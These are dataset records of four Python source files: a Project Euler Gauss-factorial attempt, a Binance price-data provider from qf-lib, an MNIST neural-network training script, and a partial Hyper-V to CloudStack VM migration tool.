1:\r\n return []\r\n else:\r\n factorsArray = []\r\n\r\n for i in range(2, value):\r\n if value % i == 0:\r\n factorsArray.append(i)\r\n\r\n return factorsArray\r\n\r\n\r\n\r\ndef FindCoprimeNumbers(value):\r\n primeArray = []\r\n nonPrimeArray = []\r\n\r\n for i in range(1,value):\r\n if CheckIfPositivePrime(i) == True:\r\n primeArray.append(i)\r\n else:\r\n nonPrimeArray.append(i)\r\n\r\n factorsArray = FindFactors(value)\r\n coprimeArray = []\r\n\r\n for i in primeArray:\r\n if factorsArray.__contains__(i) == False:\r\n coprimeArray.append(i)\r\n\r\n for i in nonPrimeArray:\r\n factorsArrayForNonprime = FindFactors(i)\r\n hasSameFactors = False\r\n\r\n for j in factorsArrayForNonprime:\r\n if factorsArray.__contains__(j) == True:\r\n hasSameFactors = True\r\n\r\n if hasSameFactors == False:\r\n coprimeArray.append(i)\r\n\r\n return coprimeArray\r\n\r\n\r\n\r\ndef FindProductOfArray(values):\r\n if values == []:\r\n return\r\n\r\n product = values[0]\r\n\r\n for i in values:\r\n product *= i\r\n\r\n return product\r\n\r\n\r\n\r\ndef FindGaussFactorial(value):\r\n coprimeArray = FindCoprimeNumbers(value)\r\n product = FindProductOfArray(coprimeArray)\r\n\r\n return product\r\n\r\n\r\n\r\n#gauss factorial of a number n is defined as the product of all positive numbers <= n that are relatively prime to n\r\n\r\n#project euler problem\r\n#G(n) =\r\n#n\r\n#pi notation -> gauss factorial(i)\r\n#i=1\r\n\r\n\r\n\r\ndef AnswerProblem(n):\r\n gaussFactorialArray = []\r\n\r\n for i in range(1, n + 1):\r\n if FindGaussFactorial(i) != None:\r\n gaussFactorialArray.append(FindGaussFactorial(i))\r\n return FindProductOfArray(gaussFactorialArray)\r\n\r\n\r\n\r\n#question is find G(10^8) mod 1 000 000 007\r\nanswer = AnswerProblem(10**8) % 1000000007\r\n\r\n\r\n\r\n","repo_name":"Aemxander/gauss-factorial","sub_path":"GaussFactorial.py","file_name":"GaussFactorial.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38365188164","text":"from datetime import datetime\nfrom typing import Union, Sequence\n\nimport pytz\nimport pandas as pd\nfrom binance import Client\nfrom numpy import float64\n\nfrom qf_lib.brokers.binance_broker.binance_contract_ticker_mapper import BinanceContractTickerMapper\nfrom qf_lib.common.utils.miscellaneous.to_list_conversion import convert_to_list\n\nfrom qf_lib.common.enums.frequency import Frequency\nfrom qf_lib.common.enums.price_field import PriceField\nfrom qf_lib.common.tickers.tickers import Ticker\nfrom qf_lib.common.utils.dateutils.date_format import DateFormat\nfrom qf_lib.common.utils.dateutils.relative_delta import RelativeDelta\nimport os\nfrom qf_lib.common.utils.logging.qf_parent_logger import qf_logger\n\nfrom qf_lib.containers.dataframe.qf_dataframe import QFDataFrame\nfrom qf_lib.data_providers.csv.csv_data_provider import CSVDataProvider\n\n\nclass BinanceDataProvider(CSVDataProvider):\n \"\"\"\n Binance Data Provider that downloads data in the range from start_date to end_date. Particularly, the data provider can be\n used in live trading with end_date corresponding to current time. Downloaded data is saved in .csv format and then\n loaded into CSVDataProvider\n\n Parameters\n -----------\n path: str\n path to directory where the files should be saved\n filename: str\n name of the file in which data should be saved e.g. Binance_data_{end_time.strftime(\"%Y-%m-%d %H_%M_%S\")}.csv\n tickers: Union[Ticker, Sequence[Ticker]]\n one or a list of tickers, used further to download the prices data\n start_date: datetime\n beginning of the data in local time (it is automatically converted to UTC time used by binance)\n end_date: datetime\n end of the data in local time (it is automatically converted to UTC time used by binance)\n contract_ticker_mapper: BinanceContractTickerMapper\n object which contains a set of parameters for every ticker and allows to map a ticker onto a broker\n specific contract / ticker object that could be afterwards used while sending the Order.\n frequency: Frequency = Frequency.MIN_1\n frequency of the data\n \"\"\"\n\n def __init__(self, path: str, filename: str, tickers: Union[Ticker, Sequence[Ticker]], start_date: datetime, end_date: datetime,\n contract_ticker_mapper: BinanceContractTickerMapper, frequency: Frequency = Frequency.MIN_1):\n\n if frequency not in [Frequency.DAILY, Frequency.MIN_1]:\n raise NotImplementedError(\"Only 1m and DAILY freq is supported now\")\n\n self.contract_ticker_mapper = contract_ticker_mapper\n\n tickers, _ = convert_to_list(tickers, Ticker)\n\n self.frequency_mapping = {\n Frequency.DAILY: '1d',\n Frequency.MIN_1: '1m'\n }\n\n index_col = 'Dates'\n field_to_price_field_dict = {'Open': PriceField.Open, 'High': PriceField.High, 'Low': PriceField.Low,\n 'Close': PriceField.Close, 'Volume': PriceField.Volume}\n fields = ['Open', 'High', 'Low', 'Close', 'Volume']\n ticker_col = 'Ticker'\n\n self.logger = qf_logger.getChild(self.__class__.__name__)\n\n self.logger.info(\"creating BinanceDataProvider\")\n self.client = Client()\n\n filepath = os.path.join(path, filename)\n\n self._load_data(filepath, tickers, fields, start_date, end_date, frequency, index_col, ticker_col)\n\n super().__init__(filepath, tickers, index_col, field_to_price_field_dict, fields, start_date, end_date, frequency, ticker_col=ticker_col)\n\n def _load_data(self, filepath, tickers, fields, start_date, end_date, frequency, index_col, ticker_col):\n if not os.path.isfile(filepath):\n list_of_dfs = [self._download_binance_data_df(ticker, start_date, end_date, frequency, ticker_col) for ticker in tickers]\n else:\n\n list_of_dfs = []\n df = pd.read_csv(filepath, index_col=index_col, parse_dates=['Dates'], engine='python')\n\n infer_freq = Frequency.infer_freq(df.index)\n\n if infer_freq != frequency:\n raise ValueError(f'Requested frequency: {frequency} is different from the one in the file: {infer_freq}')\n\n for ticker in tickers:\n\n current_df = df[df[ticker_col] == ticker.as_string()]\n\n if current_df.empty:\n current_end_date = start_date\n else:\n current_end_date = current_df.index[-1].to_pydatetime()\n\n if current_end_date == end_date:\n list_of_dfs.append(current_df)\n continue\n\n df_to_append = self._download_binance_data_df(ticker, current_end_date, end_date, frequency, ticker_col)\n combined_df = pd.concat([current_df, df_to_append])\n combined_df = combined_df[~combined_df.index.duplicated(keep='last')] # to have the most recent bar data updated\n list_of_dfs.append(combined_df)\n\n df = pd.concat(list_of_dfs)\n df.loc[:, fields] = df.loc[:, fields].astype(float64)\n df.to_csv(filepath)\n\n def _download_binance_data_df(self, ticker, start_time: datetime, end_time: datetime, frequency, ticker_col) -> QFDataFrame:\n start_time = start_time + RelativeDelta(second=0, microsecond=0)\n end_time = end_time + RelativeDelta(second=0, microsecond=0)\n\n # the requested time has to be in UTC\n start_time_str = start_time.astimezone(pytz.UTC).strftime(DateFormat.FULL_ISO.format_string)\n end_time_str = end_time.astimezone(pytz.UTC).strftime(DateFormat.FULL_ISO.format_string)\n\n res_dict = {'Dates': [], 'Open': [], 'High': [], 'Low': [], 'Close': [], 'Volume': [], ticker_col: []}\n\n symbol = self.contract_ticker_mapper.ticker_to_contract(ticker)\n\n res = self.client.get_historical_klines(symbol=symbol,\n interval=self.frequency_mapping[frequency],\n start_str=start_time_str, end_str=end_time_str, limit=1000)\n\n for i in res:\n # response is parsed to local time from unix milliseconds\n res_dict['Dates'].append(datetime.fromtimestamp(i[0] / 1000).strftime('%Y-%m-%d %H:%M:%S'))\n res_dict['Open'].append(i[1])\n res_dict['High'].append(i[2])\n res_dict['Low'].append(i[3])\n res_dict['Close'].append(i[4])\n res_dict['Volume'].append(i[5])\n res_dict[ticker_col].append(ticker.as_string())\n\n df = QFDataFrame(res_dict).set_index('Dates')\n df.index = pd.to_datetime(df.index, format=str(DateFormat.FULL_ISO))\n\n missing_dates = pd.date_range(start=start_time, end=end_time, freq=frequency.to_pandas_freq()).difference(df.index)\n\n if not missing_dates.empty:\n self.logger.info(f'Missing dates: {missing_dates} for ticker: {ticker}')\n\n df = df[~df.index.duplicated(keep='first')]\n return df\n","repo_name":"quarkfin/qf-lib","sub_path":"qf_lib/data_providers/binance_dp/binance_data_provider.py","file_name":"binance_data_provider.py","file_ext":"py","file_size_in_byte":6995,"program_lang":"python","lang":"en","doc_type":"code","stars":396,"dataset":"github-code","pt":"77"} +{"seq_id":"41670318645","text":"import torch\nfrom matplotlib import pyplot as plt\nfrom torch import nn, optim\nfrom torch.utils.data import random_split, DataLoader\nfrom torchvision import datasets, transforms\n\ndataset = datasets.MNIST(\n\t'data/mnist', train=True, download=True, transform=transforms.ToTensor())\n\nimg_batch, label = dataset[0]\n\nimg_batch.shape\n\nplt.imshow(img_batch[0], cmap='gray')\nplt.show()\n\ntrain, val = random_split(dataset, [55000, 5000])\ntrain_loader = DataLoader(train, batch_size=32)\nval_loader = DataLoader(val, batch_size=32)\n\n# Step 1: Define the model\nmodel = nn.Sequential(\n\tnn.Linear(784, 128),\n\tnn.ReLU(),\n\tnn.Linear(128, 64),\n\tnn.ReLU(),\n\tnn.Linear(64, 64),\n\tnn.ReLU(),\n\tnn.Linear(64, 128),\n\tnn.ReLU(),\n\tnn.Linear(128, 10)\n)\n\n# Step 2: Define an optimizer\noptimizer = optim.Adam(model.parameters(), lr=1e-2)\n\n# Step 3: Define a loss function\nloss = nn.CrossEntropyLoss()\n\n# Step 4: Train the model\nepochs = 100\nfor epoch in range(epochs):\n\ttrain_losses = list()\n\ttrain_accuracy = list()\n\tfor batch in train_loader:\n\t\tx, y = batch\n\n\t\t# Convert this to (batch, dimensions) without the color channel\n\t\tb = x.size(0)\n\t\tx = x.view(b, -1)\n\n\t\t# Forward pass\n\t\tlogits = model(x)\n\n\t\t# Calculate loss\n\t\tJ = loss(logits, y)\n\n\t\t# Reset the accumulated gradient map\n\t\tmodel.zero_grad()\n\n\t\t# Backpropagate the error\n\t\tJ.backward()\n\n\t\t# Update the parameters\n\t\toptimizer.step()\n\n\t\ttrain_losses.append(J.item())\n\t\ttrain_accuracy.append(\n\t\t\ty.eq(logits.argmax(dim=1).float().mean()))\n\n\t# Validation\n\tval_losses = list()\n\tval_accuracy = list()\n\tfor batch in val_loader:\n\t\tx, y = batch\n\n\t\t# Convert this to (batch, dimensions) without the color channel\n\t\tb = x.size(0)\n\t\tx = x.view(b, -1)\n\n\t\t# Forward pass\n\t\twith torch.no_grad(x):\n\t\t\tlogits = model(x)\n\n\t\t# Calculate loss\n\t\tJ = loss(logits, y)\n\n\t\tval_losses.append(J.item())\n\t\tval_accuracy.append(\n\t\t\ty.eq(logits.argmax(dim=1).float().mean()))\n\n\tprint(\n\t\tf'Epoch {epoch + 1}, train loss: {torch.tensor(train_losses).mean():.2f},'\n\t\tf'val loss: {torch.tensor(val_losses).mean():.2f}\\n'\n\t\tf'train accuracy: {torch.tensor(train_accuracy).mean():.2f}, '\n\t\tf'val accuracy: {torch.tensor(val_accuracy).mean():.2f}\\n')\n","repo_name":"esperie/ml_basics","sub_path":"applications/image_matching/algo/digits_recognition.py","file_name":"digits_recognition.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5022958335","text":"#!/usr/bin/env python\r\n\r\n## Copyright (c) 2014 Citrix Systems, Inc. All Rights Reserved.\r\n## You may only reproduce, distribute, perform, display, or prepare derivative works of this file pursuant to a valid license from Citrix.\r\n\r\nfrom lib.hyperv import HyperV # the class\r\nfrom lib.hyperv import hyperv # the connection\r\nimport lib.cloudstack\r\nfrom lib.cloudstack import cs\r\nimport json\r\nimport hashlib\r\nimport ntpath\r\nimport os\r\nimport pprint\r\nimport sys\r\nimport time\r\nimport re\r\nimport traceback\r\nimport lib.config_manager\r\nfrom lib.config_manager import ConfigManager\r\nimport common_services\r\nfrom common_services import CommonServices\r\n\r\nclass HypverMigrator:\r\n\r\n\tdef __init__(self, confMgr):\r\n\t\tHYPERVISOR_TYPE = 'hyperv'\r\n\t\tdefaultHypervConfig =[\r\n\t\t('HYPERVISOR', 'hypervisorType', HYPERVISOR_TYPE),\r\n\t\t('HYPERVISOR', 'migration_input_file', './input/migrate_hyperv_input.json'), \r\n\t\t('HYPERVISOR', 'pscp_exe', 'C:\\pscp.exe'),\r\n\t\t('HYPERVISOR', 'log_file', './logs/hyperv_api.log'),\r\n\t\t('STATE', 'active_migration', 'False')\r\n\t\t]\r\n\r\n\t\tself.confMgr = confMgr\r\n\t\tif not self.confMgr:\r\n\t\t\tconfigFile = './settings-' + HYPERVISOR_TYPE + '.conf'\r\n\t\t\tpersistentStore = './running-'+HYPERVISOR_TYPE+'.conf'\r\n\t\t\tself.confMgr = ConfigManager(configFile, persistentStore, defaultHypervConfig)\r\n\r\n\t\tself.confMgr.addOptionsToSection('CLOUDSTACK', lib.cloudstack.getCloudStackConfig()) #let's put all the running configs in the same persistent store\r\n\t\tself.log = common_services.createMigrationLog(self.confMgr)\r\n\t\tself.commonService = CommonServices(self.confMgr)\r\n\r\n\tdef updateVms(self, vms):\r\n\t\tself.confMgr.updateOptions([('STATE', 'vms', vms)], True)\r\n\r\n\r\n\tdef get_vm_raw_from_src(self, vm_in):\r\n\t\t# make sure the minimum fields were entered and they have not been processed already\r\n\t\tif 'hyperv_vm_name' in vm_in and 'hyperv_server' in vm_in:\r\n\t\t\tobjs, ok = hyperv.powershell('Get-VM -Name \"%s\" -Server \"%s\"' % (vm_in['hyperv_vm_name'], vm_in['hyperv_server']))\r\n\t\t\tif objs and ok: # make sure it found the specified VM\r\n\t\t\t\treturn objs[0]\r\n\r\n\tdef get_vm_info(self, vm_id, vm_in, vm_raw):\r\n\t\tif not vm_raw: # vm_raw will be null if we are not running discovery process, instead we are just reading the an input file for vms to be migrated.\r\n\t\t\tvm_raw = get_vm_raw_from_src(vm_in)\r\n\r\n\t\tif vm_raw: # make sure it found the specified VM\r\n\t\t\tself.log.info('\\nGETTING VM INFO %s\\n%s' % (vm_in['hyperv_vm_name'], '----------'+'-'*len(vm_in['hyperv_vm_name'])))\r\n\r\n\t\t\tvm_out = vm_in\r\n\t\t\tvm_out['id'] = vm_id\r\n\t\t\t\r\n\t\t\tvm_out['src_name'] = vm_raw['ElementName']\r\n\t\t\tvm_out['src_type'] = vm_raw['ElementName']\r\n\r\n\t\t\t# get cores, cpus\r\n\t\t\tcpu, ok = hyperv.powershell('Get-VMCPUCount -VM \"%s\" -Server \"%s\"' % (vm_in['hyperv_vm_name'], vm_in['hyperv_server']))\r\n\t\t\tif ok:\r\n\t\t\t\tvm_out['src_cpus'] = int(cpu[0]['ProcessorsPerSocket']) * int(cpu[0]['SocketCount'])\r\n\t\t\telse:\r\n\t\t\t\tself.handleError('Get-VMCPUCount powershell command failed on %s' % (vm_in['hyperv_vm_name']))\r\n\t\t\t\tself.handleError('ERROR: Check the \"%s\" log for details' % (self.confMgr.get('HYPERVISOR', 'log_file')))\r\n\r\n\t\t\t# get memory\r\n\t\t\tmemory, ok = hyperv.powershell('Get-VMMemory -VM \"%s\" -Server \"%s\"' % (vm_in['hyperv_vm_name'], vm_in['hyperv_server']))\r\n\t\t\tif ok:\r\n\t\t\t\tvm_out['src_memory'] = int(memory[0]['Reservation'])\r\n\t\t\telse:\r\n\t\t\t\tself.handleError('Get-VMMemory powershell command failed on %s' % (vm_in['hyperv_vm_name']))\r\n\t\t\t\tself.handleError('ERROR: Check the \"%s\" log for details' % (self.confMgr.get('HYPERVISOR', 'log_file')))\r\n\r\n\t\t\t# record their starting state and bring down if running\r\n\t\t\tif int(vm_raw['EnabledState']) == HyperV.VM_RUNNING:\r\n\t\t\t\tvm_out['state'] = 'running'\r\n\t\t\t\tself.log.info('VM %s is Running' % (vm_in['hyperv_vm_name']))\r\n\t\t\telif int(vm_raw['EnabledState']) == HyperV.VM_STOPPED:\r\n\t\t\t\tvm_out['state'] = 'stopped'\r\n\t\t\t\tself.log.info('VM %s is Stopped' % (vm_in['hyperv_vm_name']))\r\n\t\t\telse: # this should be improved...\r\n\t\t\t\tvm_out['state'] = 'unknown'\r\n\t\t\t\tself.handleError('VM %s is in an Unknown state' % (vm_in['hyperv_vm_name']))\r\n\r\n\t\t\tif (vm_out['state'] == 'running' and ok) or vm_out['state'] == 'stopped':\r\n\t\t\t\tdisks, ok = hyperv.powershell('Get-VMDisk -VM \"%s\"' % (vm_in['hyperv_vm_name']))\r\n\t\t\t\tif ok:\r\n\t\t\t\t\t# if 'src_disks' not in vms[vm_id] or (\r\n\t\t\t\t\t# \t\t'src_disks' in vms[vm_id] and len(vms[vm_id]['src_disks']) != len(disks)):\r\n\t\t\t\t\tvm_out['src_disks'] = []\r\n\t\t\t\t\tfor disk in disks:\r\n\t\t\t\t\t\tif 'DriveName' in disk and disk['DriveName'] == 'Hard Drive' and 'DiskImage' in disk:\r\n\t\t\t\t\t\t\tvm_out['src_disks'].append({\r\n\t\t\t\t\t\t\t\t'size': '0',\r\n\t\t\t\t\t\t\t\t'label': disk['DriveName'],\r\n\t\t\t\t\t\t\t\t'path': disk['DiskImage'], # the src path\r\n\t\t\t\t\t\t\t\t'name':ntpath.split(disk['DiskImage'])[1].replace(' ', '-').split('.')[0],\r\n\t\t\t\t\t\t\t\t'url':'%s://%s:%s%s%s' % (\r\n\t\t\t\t\t\t\t\t\t'https' if self.confMgr.get('FILESERVER', 'port') == '443' else 'http',\r\n\t\t\t\t\t\t\t\t\tself.confMgr.get('FILESERVER', 'host'),\r\n\t\t\t\t\t\t\t\t\tself.confMgr.get('FILESERVER', 'port'),\r\n\t\t\t\t\t\t\t\t\tself.confMgr.get('FILESERVER', 'base_uri'),\r\n\t\t\t\t\t\t\t\t\tntpath.split(disk['DiskImage'])[1].replace(' ', '-')\r\n\t\t\t\t\t\t\t\t\t)\r\n\t\t\t\t\t\t\t\t})\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.handleError('Get-VMDisk powershell command failed on %s' % (vm_in['hyperv_vm_name']))\r\n\t\t\t\t\tself.handleError('ERROR: Check the \"%s\" log for details' % (self.confMgr.get('HYPERVISOR', 'log_file')))\r\n\t\t\t\tvm_out['migrationState'] = ''\r\n\t\treturn vm_out\r\n\r\n\r\n\tdef discover_vms(self):\r\n\t\tself.confMgr.refresh()\r\n\t\tif self.confMgr.has_option('STATE', 'vms'):\r\n\t\t\t# initialize the 'vms' variable from the existing config...\r\n\t\t\tvms = json.loads(self.confMgr.get('STATE', 'vms'))\r\n\t\telse:\r\n\t\t\tvms = {}\r\n\r\n\t\tif self.confMgr.has_option('STATE', 'vm_order'):\r\n\t\t\torder = json.loads(self.confMgr.get('STATE', 'vm_order'))\r\n\t\telse:\r\n\t\t\torder = []\r\n\r\n\t\twith open(self.confMgr.get('HYPERVISOR', 'log_file'), 'a') as f:\r\n\t\t\tf.write('\\n\\nDISCOVERING HYPERV...\\n')\r\n\r\n\t\tdiscovered = [] # vms of this discovery. we will remove the vm's from 'vms' later if they are not in this array.\r\n\r\n\t\tvm_input = {}\r\n\r\n\t\tself.log.info('\\n-----------------------\\n-- discovering vms... --\\n-----------------------')\r\n\t\t# collect data about the VMs from HyperV and populate a list of VMs\r\n\t\tHypervHost = 'HYPERV1'\r\n\t\tobjs, ok = hyperv.powershell('Get-VM -Server \"%s\" ' % (HypervHost))\r\n\t\tif objs and ok: \r\n\t\t\t# self.log.info('\\nGETTING VM INFO %s\\n%s' % (vm_in['hyperv_vm_name'], '----------'+'-'*len(vm_in['hyperv_vm_name'])))\r\n\t\t\tfor hypervObj in objs: # loop through the vms in the file\r\n\t\t\t\tvm_in = {}\r\n\t\t\t\tself.log.info(hypervObj)\r\n\t\t\t\tvm_in['hyperv_server'] = HypervHost\r\n\t\t\t\tvm_in['hyperv_vm_name'] = hypervObj['ElementName']\r\n\t\t\t\tvm_id = hashlib.sha1(vm_in['hyperv_server']+\"|\"+vm_in['hyperv_vm_name']).hexdigest()\r\n\t\t\t\tself.log.info(\"............vm_id is %s\" % vm_id)\r\n\t\t\t\tif vm_id not in order:\r\n\t\t\t\t\tself.log.info(\"............vm_id %s not in order %s\" % (vm_id, order))\r\n\t\t\t\t\torder.append(vm_id)\r\n\t\t\t\tif vm_id not in vms:\r\n\t\t\t\t\tself.log.info(\"............vm_id %s not in vms %s\" % (vm_id, vms))\r\n\t\t\t\t\tvms[vm_id] = {}\r\n\r\n\t\t\t\tvms[vm_id].update(self.get_vm_info(vm_id, vm_in, hypervObj))\r\n\t\t\t\tdiscovered.append(vm_id)\r\n\t\t\t\t\t\t\r\n\t\t# loop through the 'vms' and remove any that were not discovered in this pass...\r\n\t\tfor vm_id in vms.keys():\r\n\t\t\tif vm_id not in discovered:\r\n\t\t\t\tdel vms[vm_id] # no longer a valid VM, so remove it...\r\n\t\t\t\tif vm_id in order: # remove the vm from the order list as well if it exists...\r\n\t\t\t\t\torder.remove(vm_id)\r\n\r\n\t\t### Update the running-hyperv.conf file\r\n\t\tself.confMgr.updateOptions([('STATE', 'vms', vms), ('STATE', 'vm_order', order)], True)\r\n\t\tself.confMgr.updateRunningConfig()\r\n\r\n\t\treturn vms, order\r\n\r\n\tdef discover_vms_from_input_files(self):\r\n\t\tself.confMgr.refresh()\r\n\t\tif self.confMgr.has_option('STATE', 'vms'):\r\n\t\t\t# initialize the 'vms' variable from the existing config...\r\n\t\t\tvms = json.loads(self.confMgr.get('STATE', 'vms'))\r\n\t\telse:\r\n\t\t\tvms = {}\r\n\r\n\t\tif self.confMgr.has_option('STATE', 'vm_order'):\r\n\t\t\torder = json.loads(self.confMgr.get('STATE', 'vm_order'))\r\n\t\telse:\r\n\t\t\torder = []\r\n\r\n\t\twith open(self.confMgr.get('HYPERVISOR', 'log_file'), 'a') as f:\r\n\t\t\tf.write('\\n\\nDISCOVERING HYPERV...\\n')\r\n\r\n\t\tdiscovered = [] # vms of this discovery. we will remove the vm's from 'vms' later if they are not in this array.\r\n\r\n\t\tvm_input = {}\r\n\t\tif os.path.exists(self.confMgr.get('HYPERVISOR', 'migration_input_file')):\r\n\t\t\twith open(self.confMgr.get('HYPERVISOR', 'migration_input_file'), 'r') as f:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tvm_input = json.load(f)\r\n\t\t\t\texcept:\r\n\t\t\t\t\tself.log.info(sys.exc_info())\r\n\t\t\t\t\tsys.exit(\"Error in the formatting of '%s'\" % (self.confMgr.get('HYPERVISOR', 'migration_input_file')))\r\n\r\n\t\tself.log.info('\\n-----------------------\\n-- discovering vms... --\\n-----------------------')\r\n\t\t# collect data about the VMs from HyperV and populate a list of VMs\r\n\r\n\t\tif vm_input: # make sure there is data in the file\r\n\t\t\tfor vm_key in vm_input: # loop through the vms in the file\r\n\t\t\t\tvm_in = vm_input[vm_key]\r\n\t\t\t\tself.log.info(vm_in)\r\n\t\t\t\tvm_id = hashlib.sha1(vm_in['hyperv_server']+\"|\"+vm_in['hyperv_vm_name']).hexdigest()\r\n\t\t\t\tself.log.info(\"............vm_id is %s\" % vm_id)\r\n\t\t\t\tif vm_id not in order:\r\n\t\t\t\t\tself.log.info(\"............vm_id %s not in order %s\" % (vm_id, order))\r\n\t\t\t\t\torder.append(vm_id)\r\n\t\t\t\tif vm_id not in vms:\r\n\t\t\t\t\tself.log.info(\"............vm_id %s not in vms %s\" % (vm_id, vms))\r\n\t\t\t\t\tvms[vm_id] = {}\r\n\r\n\t\t\t\tvms[vm_id].update(self.get_vm_info(vm_id, vm_in, None))\r\n\t\t\t\tdiscovered.append(vm_id)\r\n\t\t\t\t\t\t\r\n\t\t# loop through the 'vms' and remove any that were not discovered in this pass...\r\n\t\tfor vm_id in vms.keys():\r\n\t\t\tif vm_id not in discovered:\r\n\t\t\t\tdel vms[vm_id] # no longer a valid VM, so remove it...\r\n\t\t\t\tif vm_id in order: # remove the vm from the order list as well if it exists...\r\n\t\t\t\t\torder.remove(vm_id)\r\n\r\n\t\t### Update the running-hyperv.conf file\r\n\t\tself.confMgr.updateOptions([('STATE', 'vms', vms), ('STATE', 'vm_order', order)], True)\r\n\t\tself.confMgr.updateRunningConfig()\r\n\r\n\t\treturn vms, order\r\n\r\n\r\n\t# copy vhd files to the file server\r\n\tdef copy_vhd_to_file_server(self, vhd_path, vhd_name):\r\n\t\treturn hyperv.powershell('%s -l %s -pw %s \"%s\" %s:%s/%s' % (\r\n\t\t\tself.confMgr.get('HYPERVISOR', 'pscp_exe'),\r\n\t\t\tself.confMgr.get('FILESERVER', 'username'),\r\n\t\t\tself.confMgr.get('FILESERVER', 'password'),\r\n\t\t\tvhd_path,\r\n\t\t\tself.confMgr.get('FILESERVER', 'host'),\r\n\t\t\tself.confMgr.get('FILESERVER', 'files_path'),\r\n\t\t\tvhd_name\r\n\t\t))\r\n\r\n\r\n\tdef export_vm(self, vm_id):\r\n\t\tself.log.info('\\n-----------------------\\n-- RUNNING VM EXPORT --\\n-----------------------')\r\n\t\tself.confMgr.refresh()\r\n\t\tif not self.confMgr.getboolean('STATE', 'migrate_error'):\r\n\t\t\t# initialize the 'vms' variable from the existing config...\r\n\t\t\tvms = json.loads(self.confMgr.get('STATE', 'vms'))\r\n\t\t\tself.log.info('EXPORTING %s' % (vms[vm_id]['src_name']))\r\n\t\t\tvms[vm_id]['clean_name'] = re.sub('[^0-9a-zA-Z]+', '-', vms[vm_id]['src_name']).strip('-')\r\n\r\n\t\t\t# make sure the minimum fields were entered and they have not been processed already\r\n\r\n\t\t\tif vms[vm_id]['state'] == 'running' or vms[vm_id]['state'] == 'stopped':\r\n\t\t\t\texported = False\r\n\t\t\t\tfor disk in vms[vm_id]['src_disks']:\r\n\t\t\t\t\tif 'label' in disk and disk['label'] == 'Hard Drive' and 'path' in disk:\r\n\t\t\t\t\t\tself.log.info('Copying drive %s' % (disk['path']))\r\n\t\t\t\t\t\tresult, ok = self.copy_vhd_to_file_server(disk['path'], ntpath.split(disk['path'])[1].replace(' ', '-'))\r\n\t\t\t\t\t\tif ok:\r\n\t\t\t\t\t\t\tself.log.info('Finished copy...')\r\n\t\t\t\t\t\t\texported = True\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tself.handleError('Copy failed...')\r\n\t\t\t\t\t\t\tself.handleError('ERROR: Check the \"%s\" log for details' % (self.confMgr.get('HYPERVISOR', 'log_file')))\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tself.log.info('No label/path (DiskName/DiskImage) field or no label is not Hard Drive for disk: %s' % (disk))\r\n\r\n\r\n\t\t\t# bring the machines back up that were running now that we copied their disks\r\n\t\t\tif vms[vm_id]['state'] == 'running':\r\n\t\t\t\tstatus, ok = hyperv.powershell('Start-VM -VM \"%s\" -Server \"%s\" -Wait -Force' % (vms[vm_id]['hyperv_vm_name'], vms[vm_id]['hyperv_server']))\r\n\t\t\t\tif ok:\r\n\t\t\t\t\tself.log.info('Re-Started VM %s' % (vms[vm_id]['hyperv_vm_name']))\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.handleError('Failed to restart the server.')\r\n\t\t\t\t\tself.handleError('ERROR: Check the \"%s\" log for details' % (self.confMgr.get('HYPERVISOR', 'log_file')))\r\n\r\n\t\t\tif exported:\r\n\t\t\t\tself.log.info('Finished exporting %s' % (vms[vm_id]['hyperv_vm_name']))\r\n\t\t\t\t### Update the running-hyperv.conf file\r\n\t\t\t\tself.confMgr.refresh()\r\n\t\t\t\tvms[vm_id]['migrationState'] = 'exported'\r\n\t\t\t\tself.updateVms(vms)\r\n\t\t\t\tself.confMgr.updateRunningConfig()\r\n\r\n\t\tself.log.info(\"\\nCurrent VM Objects:\")\r\n\t\tself.log.info(vms[vm_id])\r\n\r\n\tdef import_vm(self, vm_id):\r\n\t\tself.log.info('\\n\\n-----------------------\\n-- RUNNING VM IMPORT --\\n-----------------------')\r\n\t\tvms = json.loads(self.confMgr.get('STATE', 'vms'))\r\n\t\tself.log.info(\"migrationState is: %s\" % (vms[vm_id]['migrationState']))\r\n\t\tif vms[vm_id]['migrationState'] == 'exported':\r\n\t\t\tself.log.info('IMPORTING %s\\n%s' % (vms[vm_id]['hyperv_vm_name'], '----------'+'-'*len(vms[vm_id]['hyperv_vm_name'])))\r\n\t\t\timported = False\r\n\r\n\t\t\t## setup the cloudstack details we know (or are using defaults for)\r\n\t\t\t# we always have cs_zone... and this is not there vmware migrate, so we will retire this for now\r\n\t\t\t# if 'cs_zone' not in vms[vm_id] and self.confMgr.has_option('CLOUDSTACK', 'default_zone'):\r\n\t\t\t# \tvms[vm_id]['cs_zone'] = self.confMgr.get('CLOUDSTACK', 'default_zone')\r\n\t\t\t# \tzone = cs.request(dict({'command':'listZones', 'id':vms[vm_id]['cs_zone']}))\r\n\t\t\t# \tif zone and 'zone' in zone and len(zone['zone']) > 0:\r\n\t\t\t# \t\tif zone['zone'][0]['networktype'] == 'Basic':\r\n\t\t\t# \t\t\tvms[vm_id]['cs_zone_network'] = 'basic'\r\n\t\t\t# \t\telse:\r\n\t\t\t# \t\t\tvms[vm_id]['cs_zone_network'] = 'advanced'\r\n\r\n\t\t\tif 'cs_domain' not in vms[vm_id] and self.confMgr.has_option('CLOUDSTACK', 'default_domain'):\r\n\t\t\t\tvms[vm_id]['cs_domain'] = self.confMgr.get('CLOUDSTACK', 'default_domain')\r\n\r\n\t\t\tif 'cs_account' not in vms[vm_id] and self.confMgr.has_option('CLOUDSTACK', 'default_account'):\r\n\t\t\t\tvms[vm_id]['cs_account'] = self.confMgr.get('CLOUDSTACK', 'default_account')\r\n\r\n\t\t\tif 'cs_network' not in vms[vm_id] and self.confMgr.has_option('CLOUDSTACK', 'default_network'):\r\n\t\t\t\tvms[vm_id]['cs_network'] = self.confMgr.get('CLOUDSTACK', 'default_network')\r\n\r\n\t\t\t# if 'cs_additional_networks' not in vms[vm_id] and self.confMgr.has_option('CLOUDSTACK', 'additional_networks'):\r\n\t\t\t# \tvms[vm_id]['cs_additional_networks'] = self.confMgr.get('CLOUDSTACK', 'additional_networks')\r\n\r\n\t\t\tif 'cs_service_offering' not in vms[vm_id] and self.confMgr.has_option('CLOUDSTACK', 